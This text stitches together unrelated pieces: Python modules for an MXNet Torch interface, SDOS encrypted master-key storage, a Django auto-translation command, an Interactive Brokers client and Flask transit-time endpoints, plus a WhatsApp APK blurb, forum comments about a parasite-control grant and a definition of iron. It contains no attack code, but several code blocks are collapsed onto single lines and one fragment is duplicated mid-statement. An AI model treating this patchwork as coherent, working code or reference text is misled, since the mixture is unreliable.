# with the License.  You may obtain a copy of the License at
#
#   http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied.  See the License for the
# specific language governing permissions and limitations
# under the License.

# coding: utf-8
"""Interface for NDArray functions executed by torch backend.
Install Torch and compile with USE_TORCH=1 to use this module."""
from __future__ import absolute_import

import ctypes
import sys
from .base import _LIB
from .base import c_array, c_str_array, c_handle_array, py_str, build_param_doc as _build_param_doc
from .base import mx_uint, mx_float, FunctionHandle
from .base import check_call
from .ndarray import NDArray, _new_empty_handle

try:
    _LUAJIT = ctypes.CDLL("libluajit.so", mode=ctypes.RTLD_GLOBAL)
except OSError:
    _LUAJIT = None

# pylint: disable=too-many-locals, invalid-name
def _make_torch_function(handle):
    """Create a Torch function from the FunctionHandle."""
    # Get the property of function
    n_used_vars = mx_uint()
    n_scalars = mx_uint()
    n_mutate_vars = mx_uint()
    type_mask = ctypes.c_int()
    check_call(_LIB.MXFuncDescribe(
        handle,
        ctypes.byref(n_used_vars),
        ctypes.byref(n_scalars),
        ctypes.byref(n_mutate_vars),
        ctypes.byref(type_mask)))
    n_mutate_vars = n_mutate_vars.value
    n_used_vars = n_used_vars.value
    n_scalars = n_scalars.value
    type_mask = type_mask.value

    # Get the information from the function
    name = ctypes.c_char_p()
    desc = ctypes.c_char_p()
    num_args = mx_uint()
    arg_names = ctypes.POINTER(ctypes.c_char_p)()
    arg_types = ctypes.POINTER(ctypes.c_char_p)()
    arg_descs = ctypes.POINTER(ctypes.c_char_p)()
    ret_type = ctypes.c_char_p()

    check_call(_LIB.MXFuncGetInfo(
        handle, ctypes.byref(name), ctypes.byref(desc),
        ctypes.byref(num_args),
        ctypes.byref(arg_names),
        ctypes.byref(arg_types),
        ctypes.byref(arg_descs),
        ctypes.byref(ret_type)))
    func_name = py_str(name.value)
    if not func_name.startswith('_th_'):
        return None
    narg = int(num_args.value)
    param_str = _build_param_doc(
        [py_str(arg_names[i]) for i in range(narg)],
        [py_str(arg_types[i]) for i in range(narg)],
        [py_str(arg_descs[i]) for i in range(narg)])
    if n_mutate_vars > 1:
        res = ','.join(['res%d ' % i for i in range(n_mutate_vars)])
    else:
        res = 'res '
    doc_str = (('Interface for Torch function {name}.\n' +
                'Invoke with\n{res}= mxnet.th.{name}(Parameters)\nor\n' +
                'mxnet.th.{name}({res}, Parameters).\n\n' +
                '{param_str}\n' +
                'Reference: ' +
                'https://github.com/torch/torch7/blob/master/doc/maths.md\n').format(
                    name=func_name[4:], param_str=param_str, res=res))

    def generic_torch_function(*args, **kwargs):
        """Invoke this function by passing in parameters.

        Parameters
        ----------
        *args
            Positional arguments of inputs (both scalar and `NDArray`).

        Returns
        -------
        out : NDArray
            The result NDArray(tuple) of result of computation.
""" ndargs = [] arg_format = '' value = '' for arg in args: if isinstance(arg, NDArray): ndargs.append(arg) arg_format += 'n' value += ',' elif isinstance(arg, int): arg_format += 'i' value += str(arg) + ',' elif isinstance(arg, str): arg_format += 's' value += str(arg) + ',' elif isinstance(arg, float): arg_format += 'f' value += str(arg) + ',' elif isinstance(arg, bool): arg_format += 'b' value += str(arg) + ',' value = value[:-1] if len(ndargs) == n_used_vars: ndargs = [NDArray(_new_empty_handle()) for _ in range(n_mutate_vars)] + ndargs arg_format = 'n'*n_mutate_vars + arg_format value = ','*n_mutate_vars + value elif len(ndargs) == n_mutate_vars + n_used_vars: pass else: raise AssertionError(('Incorrect number of input NDArrays. ' + 'Need to be either %d (inputs) or %d ' + '(output buffer) + %d (input)') % (n_used_vars, n_mutate_vars, n_used_vars)) kwargs['format'] = arg_format kwargs['args'] = value for k in kwargs: kwargs[k] = str(kwargs[k]) check_call(_LIB.MXFuncInvokeEx( handle, c_handle_array(ndargs[n_mutate_vars:]), # pylint: disable=invalid-slice-index c_array(mx_float, []), c_handle_array(ndargs[:n_mutate_vars]), # pylint: disable=invalid-slice-index ctypes.c_int(len(kwargs)), c_str_array(kwargs.keys()), c_str_array(kwargs.values()))) if n_mutate_vars == 1: return ndargs[0] else: return ndargs[:n_mutate_vars] # pylint: disable=invalid-slice-index # End of function declaration ret_function = generic_torch_function ret_function.__name__ = func_name[4:] ret_function.__doc__ = doc_str return ret_function # pylint: enable=too-many-locals, invalid-name def _init_torch_module(): """List and add all the torch backed ndarray functions to current module.""" plist = ctypes.POINTER(FunctionHandle)() size = ctypes.c_uint() check_call(_LIB.MXListFunctions(ctypes.byref(size), ctypes.byref(plist))) module_obj = sys.modules[__name__] for i in range(size.value): hdl = FunctionHandle(plist[i]) function = _make_torch_function(hdl) # if function name starts with underscore, register as static method of NDArray if function is not None: setattr(module_obj, function.__name__, function) # Initialize the NDArray module _init_torch_module()
WhatsApp APK is a messenger for Android smartphones and other devices. WhatsApp is used for messaging and for voice and video calls with friends and family. Switch from SMS to WhatsApp to send and receive messages, pictures, audio notes, and video messages. WHY USE WHATSAPP: Once you and your friends download the app, you can use it to chat as much as you want. Send a million messages a day to your friends for free. After installing, you can send multimedia such as videos, images, and voice notes to your friends and contacts, and enjoy group conversations with your contacts.
#!/usr/bin/python
# coding=utf-8

"""
	Project MCM - Micro Content Management
	SDOS - Secure Delete Object Store

	Copyright (C) <2017> Tim Waizenegger, <University of Stuttgart>

	This software may be modified and distributed under the terms
	of the MIT license.  See the LICENSE file for details.
"""

import io
import logging

from swiftclient import ClientException

from sdos.crypto import CryptoLib
from sdos.crypto.DataCrypt import DataCrypt

OUTERHEADER = 'SDOS_MKEY_V1\0\0\0\0'.encode(encoding='utf_8', errors='strict')  # should be 16 bytes long
KEYOBJNAME = 'masterkey.sdos'


###############################################################################
###############################################################################
# factory
###############################################################################
###############################################################################
def masterKeySourceFactory(swiftBackend, keysource_type, container_name_mgmt, tpm_key_id=None):
    """
    select and initialize one of the key sources
    :param swiftBackend:
    :param keysource_type:
    :param container_name_mgmt:
    :param tpm_key_id:
    :return:
    """
    if keysource_type == MasterKeyDummy.my_key_type:
        return MasterKeyDummy()
    elif keysource_type == MasterKeyStatic.my_key_type:
        return MasterKeyStatic(swiftBackend=swiftBackend, container_name_mgmt=container_name_mgmt)
    elif keysource_type == MasterKeyPassphrase.my_key_type:
        return MasterKeyPassphrase(swiftBackend=swiftBackend, container_name_mgmt=container_name_mgmt)
    elif keysource_type == MasterKeyTPM.my_key_type:
        return MasterKeyTPM(swiftBackend=swiftBackend, container_name_mgmt=container_name_mgmt,
                            tpm_key_id=tpm_key_id)
    else:
        raise TypeError("could not create master key source. type missing or wrong: {}".format(keysource_type))


###############################################################################
###############################################################################
# master key load/store
###############################################################################
###############################################################################
def load_wrapped_key(containerNameSdosMgmt, swiftBackend):
    logging.info("loading the wrapped master key from {}".format(containerNameSdosMgmt))
    try:
        obj = swiftBackend.getObject(container=containerNameSdosMgmt, name=KEYOBJNAME)
    except ClientException:
        logging.warning('master key obj was not found in swift container {}'.format(containerNameSdosMgmt))
        return None
    mkh = obj.read(len(OUTERHEADER))
    if not mkh == OUTERHEADER:
        raise TypeError('file header mismatch on master key obj for container {}'.format(containerNameSdosMgmt))
    by = io.BytesIO(obj.read())
    obj.close()
    return by


def store_wrapped_key(containerNameSdosMgmt, swiftBackend, wrapped_key):
    logging.info("writing the wrapped master key to {}".format(containerNameSdosMgmt))
    obj = OUTERHEADER + wrapped_key.getbuffer()
    swiftBackend.putObject(container=containerNameSdosMgmt, name=KEYOBJNAME, dataObject=obj)
    logging.debug('wrote master key to swift mgmt container {}'.format(containerNameSdosMgmt))


###############################################################################
###############################################################################
# dummy key source
# a random key each time. no back end requests, key is only in memory during run
###############################################################################
###############################################################################
class MasterKeyDummy(object):
    my_key_type = "dummy"

    def __init__(self):
        self.swiftBackend = None
        self.get_new_key_and_replace_current()

    ###############################################################################
    # API for SDOS
    ###############################################################################
    def get_current_key(self):
        return self.plainMasterKey
        # return CryptoLib.digestKeyString("hallo")

    def get_new_key_and_replace_current(self):
        self.plainMasterKey = CryptoLib.generateRandomKey()
        self.plainMasterKeyBackup = self.plainMasterKey
        return self.plainMasterKey
        # return CryptoLib.digestKeyString("hallo")

    ###############################################################################
    # API for Swift/Bluebox
    ###############################################################################
    def get_status_json(self):
        return {
            'type': self.my_key_type,
            'is_unlocked': bool(self.plainMasterKey),
            'key_id': CryptoLib.getKeyAsId(self.plainMasterKey),
            'is_next_deletable_ready': True
        }

    def clear_next_deletable(self):
        pass

    def provide_next_deletable(self, passphrase):
        pass

    def lock_key(self):
        self.plainMasterKey = None

    def unlock_key(self, passphrase=None):
        self.plainMasterKey = self.plainMasterKeyBackup


###############################################################################
###############################################################################
# static key source
# a static, hard-coded master key for testing/development
###############################################################################
###############################################################################
class MasterKeyStatic(object):
    STATIC_KEY = CryptoLib.digestKeyString('ALWAYS_THE_SAME')
    my_key_type = "static"

    def __init__(self, swiftBackend, container_name_mgmt):
        self.containerNameSdosMgmt = container_name_mgmt
        self.swiftBackend = swiftBackend
        self.plainMasterKey = None
        try:
            self.unlock_key()
        except:
            logging.error("unlocking master key failed for {}! Key source is not ready...".format(
                self.containerNameSdosMgmt))
    ###############################################################################
    # API for SDOS
    ###############################################################################
    def get_current_key(self):
        if not self.plainMasterKey:
            raise KeyError("Master key is not available")
        return self.plainMasterKey

    def get_new_key_and_replace_current(self):
        new_master = CryptoLib.generateRandomKey()
        self.plainMasterKey = new_master
        dc = DataCrypt(self.STATIC_KEY)
        wrapped_key = dc.encryptBytesIO(io.BytesIO(new_master))
        store_wrapped_key(containerNameSdosMgmt=self.containerNameSdosMgmt, swiftBackend=self.swiftBackend,
                          wrapped_key=wrapped_key)
        return self.plainMasterKey

    ###############################################################################
    # API for Swift/Bluebox
    ###############################################################################
    def get_status_json(self):
        return {
            'type': self.my_key_type,
            'is_unlocked': bool(self.plainMasterKey),
            'key_id': CryptoLib.getKeyAsId(self.plainMasterKey),
            'is_next_deletable_ready': True
        }

    def clear_next_deletable(self):
        pass

    def provide_next_deletable(self, passphrase):
        pass

    def lock_key(self):
        self.plainMasterKey = None

    def unlock_key(self, passphrase=None):
        logging.info("unlocking the master key from {}".format(self.containerNameSdosMgmt))
        by = load_wrapped_key(containerNameSdosMgmt=self.containerNameSdosMgmt, swiftBackend=self.swiftBackend)
        if not by:
            logging.error("no wrapped key found in {}. Assuming first run, creating default key".format(
                self.containerNameSdosMgmt))
            self.get_new_key_and_replace_current()
            return
        try:
            dc = DataCrypt(self.STATIC_KEY)
            plain = dc.decryptBytesIO(by)
            self.plainMasterKey = plain.read()
        except:
            raise KeyError("Failed decrypting master key")


###############################################################################
###############################################################################
# passphrase key source
# use a pass phrase as deletable key. the master key will be encrypted with a different
# password each time.
###############################################################################
###############################################################################
class MasterKeyPassphrase(object):
    my_key_type = "passphrase"

    def __init__(self, swiftBackend, container_name_mgmt):
        self.containerNameSdosMgmt = container_name_mgmt
        self.swiftBackend = swiftBackend
        self.plainMasterKey = None
        self.next_deletable = None
        logging.error("Passphrase key source initialized for {}. ... set the passphrase to unlock".format(
            self.containerNameSdosMgmt))
    ###############################################################################
    # API for SDOS
    ###############################################################################
    def get_current_key(self):
        if not self.plainMasterKey:
            raise KeyError("Master key is not available")
        return self.plainMasterKey

    def get_new_key_and_replace_current(self, first_run=False):
        if not self.next_deletable:
            raise KeyError("can't replace current master key without new wrapping (deletable) key")
        if not first_run and not self.plainMasterKey:
            raise KeyError("not allowed while current master is locked")
        new_master = CryptoLib.generateRandomKey()
        self.plainMasterKey = new_master
        dc = DataCrypt(self.next_deletable)
        self.next_deletable = None
        wrapped_key = dc.encryptBytesIO(io.BytesIO(new_master))
        store_wrapped_key(containerNameSdosMgmt=self.containerNameSdosMgmt, swiftBackend=self.swiftBackend,
                          wrapped_key=wrapped_key)
        return self.plainMasterKey

    ###############################################################################
    # API for Swift/Bluebox
    ###############################################################################
    def get_status_json(self):
        return {
            'type': self.my_key_type,
            'is_unlocked': bool(self.plainMasterKey),
            'key_id': CryptoLib.getKeyAsId(self.plainMasterKey),
            'is_next_deletable_ready': bool(self.next_deletable)
        }

    def clear_next_deletable(self):
        self.next_deletable = None

    def provide_next_deletable(self, passphrase):
        nd = CryptoLib.digestKeyString(passphrase)
        if not nd:
            raise KeyError("could not digest the provided passphrase")
        self.next_deletable = nd

    def lock_key(self):
        self.plainMasterKey = None

    def unlock_key(self, passphrase):
        logging.info("unlocking the master key from {}".format(self.containerNameSdosMgmt))
        by = load_wrapped_key(containerNameSdosMgmt=self.containerNameSdosMgmt, swiftBackend=self.swiftBackend)
        if not by:
            logging.error("no wrapped key found in {}. Assuming first run, creating default key".format(
                self.containerNameSdosMgmt))
            self.provide_next_deletable(passphrase)
            self.get_new_key_and_replace_current(first_run=True)
            return
        try:
            dc = DataCrypt(CryptoLib.digestKeyString(passphrase))
            plain = dc.decryptBytesIO(by)
            self.plainMasterKey = plain.read()
        except:
            raise KeyError("wrong passphrase. Failed decrypting master key")


###############################################################################
###############################################################################
# tpm key source
# use a tpm key as deletable key. the master key will be encrypted with a different
# tpm-bound, non-migratable key inside the TPM
###############################################################################
###############################################################################
class MasterKeyTPM(object):
    my_key_type = "tpm"

    def __init__(self, swiftBackend, container_name_mgmt, tpm_key_id):
        self.containerNameSdosMgmt = container_name_mgmt
        self.swiftBackend = swiftBackend
        self.plainMasterKey = None
        self.keyId = tpm_key_id
        assert (self.keyId > 0)
        try:
            from sdos.util.tpmLib import TpmLib
            self.tpm = TpmLib()
        except ImportError:
            logging.exception("unable to import TPM lib, TPM functions will not be available")
            self.tpm = None
        try:
            self.unlock_key()
        except:
            logging.exception("unlocking master key failed for {}! Key source is not ready...".format(
                self.containerNameSdosMgmt))
    ###############################################################################
    # API for SDOS
    ###############################################################################
    def get_current_key(self):
        if not self.plainMasterKey:
            raise KeyError("Master key is not available")
        return self.plainMasterKey

    def get_new_key_and_replace_current(self, first_run=False):
        # if not self.next_deletable:
        #     raise KeyError("can't replace current master key without new wrapping (deletable) key")
        if not first_run and not self.plainMasterKey:
            raise KeyError("not allowed while current master is locked")
        new_master = CryptoLib.generateRandomKey()
        next_deletable = self.tpm.get_new_key_and_replace_current(self.keyId, first_run=first_run)
        wrapped_key = io.BytesIO(next_deletable.bind(new_master))
        # TODO ADD key id to store_wrapped_key?
        store_wrapped_key(containerNameSdosMgmt=self.containerNameSdosMgmt, swiftBackend=self.swiftBackend,
                          wrapped_key=wrapped_key)
        self.plainMasterKey = new_master
        return self.plainMasterKey

    ###############################################################################
    # API for Swift/Bluebox
    ###############################################################################
    def get_status_json(self):
        return {
            'type': self.my_key_type,
            'is_unlocked': bool(self.plainMasterKey),
            'key_id': CryptoLib.getKeyAsId(self.plainMasterKey),
            'is_next_deletable_ready': True
        }

    def clear_next_deletable(self):
        pass

    def provide_next_deletable(self):
        pass

    def lock_key(self):
        self.plainMasterKey = None

    def unlock_key(self, passphrase=None):
        logging.info("unlocking the TPM backed master key from {}".format(self.containerNameSdosMgmt))
        by = load_wrapped_key(containerNameSdosMgmt=self.containerNameSdosMgmt, swiftBackend=self.swiftBackend)
        if not by:
            logging.error("no wrapped key found in {}. Assuming first run, creating default key".format(
                self.containerNameSdosMgmt))
            self.get_new_key_and_replace_current(first_run=True)
            return
        try:
            deletable = self.tpm.get_current_key(self.keyId)
            self.plainMasterKey = bytes(deletable.unbind(by.read()))
        except:
            raise KeyError("TPM Error. Failed decrypting master key")
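A usage sketch of the factory with the passphrase key source. The backend object is hypothetical; it only needs the getObject/putObject interface used by load_wrapped_key/store_wrapped_key above, and the container name is a placeholder:

# backend = ...  # hypothetical, already-connected swift backend
keysource = masterKeySourceFactory(swiftBackend=backend,
                                   keysource_type="passphrase",
                                   container_name_mgmt="mcm-mgmt")
keysource.unlock_key("my secret passphrase")   # decrypts the wrapped master key
master = keysource.get_current_key()           # raises KeyError while locked

# rotating the master key requires staging a new deletable (wrapping) key first
keysource.provide_next_deletable("next secret passphrase")
keysource.get_new_key_and_replace_current()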
I admit that I didn't read every word of the article, but that is not a picture of a screw worm. I know a squirrel when I see one.

“We create what every previous generation would have described as magic,” he concludes.

Next: Congress claims Harry Potter was a secret weapon that the UK stole. They do, however, want more studies before the next budget hearings. And if that doesn't scare you, nothing will!

I dunno FM, seems kinda beige to me.

"It helped researchers control the population of a deadly parasite that targets cattle--costing the government $250,000 but ultimately saving the cattle industry more than $20 billion, according to Cooper’s office." Um, then shouldn't the cattle industry have paid for it? Maybe that statement should have read "It helped researchers control the population of a deadly parasite that targets cattle--costing taxpayers $250,000, but ultimately saving US consumers more than $20 billion by reducing the cattle industry's costs...".

It has a big stick.
import logging
import os
import re

from optparse import make_option

import polib
from django.conf import settings
from django.core.management.base import BaseCommand

from autotranslate.utils import translate_strings

logger = logging.getLogger(__name__)


class Command(BaseCommand):
    help = ('autotranslate all the message files that have been generated '
            'using the `makemessages` command.')

    option_list = BaseCommand.option_list + (
        make_option('--locale', '-l', default=[], dest='locale', action='append',
                    help='autotranslate the message files for the given locale(s) (e.g. pt_BR). '
                         'can be used multiple times.'),
        make_option('--untranslated', '-u', default=False, dest='skip_translated', action='store_true',
                    help='autotranslate the fuzzy and empty messages only.'),
        make_option('--set-fuzzy', '-f', default=False, dest='set_fuzzy', action='store_true',
                    help='set the fuzzy flag on autotranslated messages.'),
    )

    def add_arguments(self, parser):
        # Previously, only the standard optparse library was supported and
        # you would have to extend the command option_list variable with optparse.make_option().
        # See: https://docs.djangoproject.com/en/1.8/howto/custom-management-commands/#accepting-optional-arguments
        # In django 1.8, these custom options can be added in the add_arguments()
        parser.add_argument('--locale', '-l', default=[], dest='locale', action='append',
                            help='autotranslate the message files for the given locale(s) (e.g. pt_BR). '
                                 'can be used multiple times.')
        parser.add_argument('--untranslated', '-u', default=False, dest='skip_translated', action='store_true',
                            help='autotranslate the fuzzy and empty messages only.')
        parser.add_argument('--set-fuzzy', '-f', default=False, dest='set_fuzzy', action='store_true',
                            help='set the fuzzy flag on autotranslated messages.')

    def set_options(self, **options):
        self.locale = options['locale']
        self.skip_translated = options['skip_translated']
        self.set_fuzzy = options['set_fuzzy']

    def handle(self, *args, **options):
        self.set_options(**options)

        assert getattr(settings, 'USE_I18N', False), 'i18n framework is disabled'
        assert getattr(settings, 'LOCALE_PATHS', []), 'locale paths is not configured properly'

        for directory in settings.LOCALE_PATHS:
            # walk through all the paths
            # and find all the po files
            for root, dirs, files in os.walk(directory):
                for file in files:
                    if not file.endswith('.po'):
                        # only process .po files
                        # (the comment in the original said "pot file", but the check is for .po)
                        continue

                    # get the target language from the parent folder name
                    target_language = os.path.basename(os.path.dirname(root))

                    if self.locale and target_language not in self.locale:
                        logger.info('skipping translation for locale `{}`'.format(target_language))
                        continue

                    self.translate_file(root, file, target_language)

    def translate_file(self, root, file_name, target_language):
        """
        convenience method for translating a po file

        :param root:            the absolute path of folder where the file is present
        :param file_name:       name of the file to be translated (it should be a po file)
        :param target_language: language in which the file needs to be translated
        """
        logger.info('filling up translations for locale `{}`'.format(target_language))

        po = polib.pofile(os.path.join(root, file_name))
        strings = self.get_strings_to_translate(po)

        # translate the strings;
        # all the translated strings are returned
        # in the same order on the same index,
        # viz. [a, b] -> [trans_a, trans_b]
        translated_strings = translate_strings(strings, target_language, 'en', False)
        self.update_translations(po, translated_strings)
        po.save()
[a, b] -> [trans_a, trans_b] translated_strings = translate_strings(strings, target_language, 'en', False) self.update_translations(po, translated_strings) po.save() def need_translate(self, entry): if self.skip_translated: return not self.skip_translated or not entry.translated() return not self.skip_translated or not entry.translated() or not entry.obsolete def get_strings_to_translate(self, po): """Return list of string to translate from po file. :param po: POFile object to translate :type po: polib.POFile :return: list of string to translate :rtype: collections.Iterable[six.text_type] """ strings = [] for index, entry in enumerate(po): if not self.need_translate(entry): continue strings.append(humanize_placeholders(entry.msgid)) if entry.msgid_plural: strings.append(humanize_placeholders(entry.msgid_plural)) return strings def update_translations(self, entries, translated_strings): """Update translations in entries. The order and number of translations should match to get_strings_to_translate() result. :param entries: list of entries to translate :type entries: collections.Iterable[polib.POEntry] | polib.POFile :param translated_strings: list of translations :type translated_strings: collections.Iterable[six.text_type] """ translations = iter(translated_strings) for entry in entries: if not self.need_translate(entry): continue if entry.msgid_plural: # fill the first plural form with the entry.msgid translation translation = next(translations) translation = fix_translation(entry.msgid, translation) entry.msgstr_plural[0] = translation # fill the rest of plural forms with the entry.msgid_plural translation translation = next(translations) translation = fix_translation(entry.msgid_plural, translation) for k, v in entry.msgstr_plural.items(): if k != 0: entry.msgstr_plural[k] = translation else: translation = next(translations) translation = fix_translation(entry.msgid, translation) entry.msgstr = translation # Set the 'fuzzy' flag on translation if self.set_fuzzy and 'fuzzy' not in entry.flags: entry.flags.append('fuzzy') def humanize_placeholders(msgid): """Convert placeholders to the (google translate) service friendly form. 
%(name)s -> __name__ %s -> __item__ %d -> __number__ """ # return re.sub( # r'%(?:\((\w+)\))?([sd])', # lambda match: r'__{0}__'.format( # match.group(1).lower() if match.group(1) else 'number' if match.group(2) == 'd' else 'item'), # msgid) msgid = re.sub( r'%(?:\(([\w\|\:\.]+)\))?(s)', lambda match: r'_____{0}_____{1}'.format(match.group(1).lower() if match.group(1) else 's', '[[[[xstr]]]]'), msgid) msgid = re.sub( r'%(?:\(([\w\|\:\.]+)\))?(d)', lambda match: r'_____{0}_____{1}'.format(match.group(1).lower() if match.group(1) else 'd', '[[[[xnum]]]]'), msgid) return msgid def restore_placeholders(msgid, translation): """Restore placeholders in the translated message.""" placehoders = re.findall(r'(\s*)(%(?:\(\w+\))?[sd])(\s*)', msgid) return re.sub( r'(\s*)(_____[\w]+?_____)(\s*)', lambda matches: '{0}{1}{2}'.format(placehoders[0][0], placehoders[0][1], placehoders.pop(0)[2]), translation) def fix_translation(msgid, translation): # Google Translate removes a lot of formatting, these are the fixes: # - Add newline in the beginning if msgid also has that if msgid.startswith('\n') and not translation.startswith('\n'): translation = u'\n' + translation # - Add newline at the end if msgid also has that if msgid.endswith('\n') and not translation.endswith('\n'): translation += u'\n' # Remove spaces that have been placed between %(id) tags translation = restore_placeholders(msgid, translation) return translation
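The placeholder shielding above is the load-bearing trick: printf-style tokens like %(name)s must survive the round trip through the translation service untouched. The commented-out regex in humanize_placeholders hints at a simpler token scheme; here is a minimal, self-contained sketch of that round trip (the token names are mine, not the sentinels the command actually emits):

import re

def shield(msgid):
    # Replace %(name)s / %s / %d with tokens MT engines tend to leave alone.
    return re.sub(
        r'%(?:\((\w+)\))?([sd])',
        lambda m: '__{0}__'.format(m.group(1) or ('number' if m.group(2) == 'd' else 'item')),
        msgid)

def unshield(msgid, translation):
    # Put the original placeholders back, in order of appearance.
    originals = re.findall(r'%(?:\(\w+\))?[sd]', msgid)
    return re.sub(r'__\w+?__', lambda m: originals.pop(0), translation)

original = 'Hello %(name)s, you have %d new messages'
shielded = shield(original)            # 'Hello __name__, you have __number__ new messages'
translated = shielded                  # pretend the MT service returned this unchanged
print(unshield(original, translated))  # 'Hello %(name)s, you have %d new messages'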
What is the definition of Iron? It is a heavy, malleable, ductile, magnetic, silver-white metallic element that readily rusts in moist air, occurs native in meteorites and combined in most igneous rocks, is the most used of metals, and is vital to biological processes, as in the transport of oxygen in the body. The physical and chemical properties are the characteristics of a substance, like Iron, which distinguish it from any other substance. Most common substances, like Iron, exist in the states of matter as solids, liquids, gases and plasma. Refer to the article on the Iron Element for additional information and facts about this substance. This article on Iron properties provides facts and information about the physical and chemical properties of Iron which are useful as homework help for chemistry students. Additional facts and information regarding the Periodic Table and the elements may be accessed via the Periodic Table Site Map.
from dateutil.tz import tz import datetime from ib_insync import Contract from ib_insync import IB from sysbrokers.IB.ib_connection import connectionIB from syscore.dateutils import strip_timezone_fromdatetime from syslogdiag.logger import logger from syslogdiag.log_to_screen import logtoscreen _PACING_PERIOD_SECONDS = 10 * 60 _PACING_PERIOD_LIMIT = 60 PACING_INTERVAL_SECONDS = 1 + (_PACING_PERIOD_SECONDS / _PACING_PERIOD_LIMIT) STALE_SECONDS_ALLOWED_ACCOUNT_SUMMARY = 600 IB_ERROR_TYPES = {200: "invalid_contract"} IB_IS_ERROR = [200] class ibClient(object): """ Client specific to interactive brokers We inherit from this to do interesting stuff, so this base class just offers error handling and get time """ def __init__(self, ibconnection: connectionIB, log: logger=logtoscreen("ibClient")): # means our first call won't be throttled for pacing self.last_historic_price_calltime = ( datetime.datetime.now() - datetime.timedelta( seconds=_PACING_PERIOD_SECONDS)) # Add error handler ibconnection.ib.errorEvent += self.error_handler self._ib_connnection = ibconnection self._log = log @property def ib_connection(self) -> connectionIB: return self._ib_connnection @property def ib(self) -> IB: return self.ib_connection.ib @property def client_id(self) -> int: return self.ib.client.clientId @property def log(self): return self._log def error_handler(self, reqid: int, error_code: int, error_string: str, contract: Contract): """ Error handler called from server Needs to be attached to ib connection :param reqid: IB reqid :param error_code: IB error code :param error_string: IB error string :param contract: IB contract or None :return: success """ if contract is None: contract_str = "" else: contract_str = " (%s/%s)" % ( contract.symbol, contract.lastTradeDateOrContractMonth, ) msg = "Reqid %d: %d %s %s" % ( reqid, error_code, error_string, contract_str) iserror = error_code in IB_IS_ERROR if iserror: # Serious requires some action myerror_type = IB_ERROR_TYPES.get(error_code, "generic") self.broker_error(msg, myerror_type) else: # just a warning / general message self.broker_message(msg) def broker_error(self, msg, myerror_type): self.log.warn(msg) def broker_message(self, msg): self.log.msg(msg) def refresh(self): self.ib.sleep(0.00001) def get_broker_time_local_tz(self) -> datetime.datetime: ib_time = self.ib.reqCurrentTime() local_ib_time_with_tz = ib_time.astimezone(tz.tzlocal()) local_ib_time = strip_timezone_fromdatetime(local_ib_time_with_tz) return local_ib_time
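PACING_INTERVAL_SECONDS above works out to 11 seconds: one second more than the 10-minute pacing window divided by its 60-request limit. A hedged sketch of how a subclass might use last_historic_price_calltime to throttle historical-data requests (the helper name is mine, not part of ibClient):

import datetime
import time

_PACING_PERIOD_SECONDS = 10 * 60
_PACING_PERIOD_LIMIT = 60
PACING_INTERVAL_SECONDS = 1 + (_PACING_PERIOD_SECONDS / _PACING_PERIOD_LIMIT)  # 11.0

def seconds_to_wait(last_call: datetime.datetime) -> float:
    """Return how long to sleep so calls stay >= PACING_INTERVAL_SECONDS apart."""
    elapsed = (datetime.datetime.now() - last_call).total_seconds()
    return max(0.0, PACING_INTERVAL_SECONDS - elapsed)

# Initialised far in the past, as in __init__ above, so the first call is never throttled
last_call = datetime.datetime.now() - datetime.timedelta(seconds=_PACING_PERIOD_SECONDS)
time.sleep(seconds_to_wait(last_call))  # sleeps 0s on the first request
last_call = datetime.datetime.now()     # record the call time for the next check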
from flask import Blueprint, make_response, request, jsonify, \ session as flask_session import json from sqlalchemy import Table, func, or_ from api.database import session, engine, Base from api.models import SourceDest endpoints = Blueprint('endpoints', __name__) @endpoints.route('/matrix/') def matrix(): start = request.args.get('start') resp = { 'meta': { 'status': 'ok', 'message': '' } } if not start: resp['meta']['status'] = 'error' resp['meta']['message'] = 'start is required' else: start = start.split(',') zone_table = Table('zone09_cmap_2009', Base.metadata, autoload=True, autoload_with=engine, keep_existing=True) school_table = Table('cps_school_locations_sy1415', Base.metadata, autoload=True, autoload_with=engine, keep_existing=True) zone_query = session.query(zone_table.c.zone09)\ .filter(func.st_contains(zone_table.c.geom, func.st_pointfromtext('POINT(' + str(start[1]) + ' ' + str(start[0]) + ')', 4326)), ) start_zone = [i[0] for i in zone_query.all()][0] school_query = session.query(SourceDest, school_table.c.schoolname, school_table.c.schooladdr)\ .filter(SourceDest.dest == school_table.c.zone)\ .filter(SourceDest.source == start_zone)\ .filter(school_table.c.school_category == 'HS')\ .order_by(SourceDest.in_vehicle_time)\ .limit(10).all() resp['objects'] = [] for source_dest, name, addr in school_query: d = source_dest.as_dict() d['school_name'] = name d['address'] = addr resp['objects'].append(d) resp = make_response(json.dumps(resp)) resp.headers['Content-Type'] = 'application/json' return resp @endpoints.route('/transit-time/') def transit_time(): start = request.args.get('start') end = request.args.get('end') resp = { 'meta': { 'status': 'ok', 'message': '' } } if not start or not end: resp['meta']['status'] = 'error' resp['meta']['message'] = 'start and end are required' else: start = start.split(',') end = end.split(',') zone_table = Table('zone09_cmap_2009', Base.metadata, autoload=True, autoload_with=engine, keep_existing=True) query = session.query(zone_table.c.zone09)\ .filter(or_( func.st_contains(zone_table.c.geom, func.st_pointfromtext('POINT(' + str(start[1]) + ' ' + str(start[0]) + ')', 4326)), func.st_contains(zone_table.c.geom, func.st_pointfromtext('POINT(' + str(end[1]) + ' ' + str(end[0]) + ')', 4326)) )) start_zone, end_zone = [i[0] for i in query.all()] travel_time = session.query(SourceDest)\ .filter(SourceDest.source == start_zone)\ .filter(SourceDest.dest == end_zone).first() resp['travel_time'] = travel_time.as_dict() resp = make_response(json.dumps(resp)) resp.headers['Content-Type'] = 'application/json' return resp
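Both endpoints expect coordinates as a "lat,lon" query string, and the code swaps the order into WKT's "lon lat" form when building the POINT. A usage sketch with the requests library (the host and coordinates are illustrative, not from the source):

import requests

BASE = 'http://localhost:5000'  # assumed local dev server

# Ten nearest high schools by in-vehicle transit time from a start point
r = requests.get(BASE + '/matrix/', params={'start': '41.8781,-87.6298'})
print(r.json()['objects'])

# Zone-to-zone travel time between two points
r = requests.get(BASE + '/transit-time/',
                 params={'start': '41.8781,-87.6298', 'end': '41.7943,-87.5917'})
print(r.json()['travel_time'])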
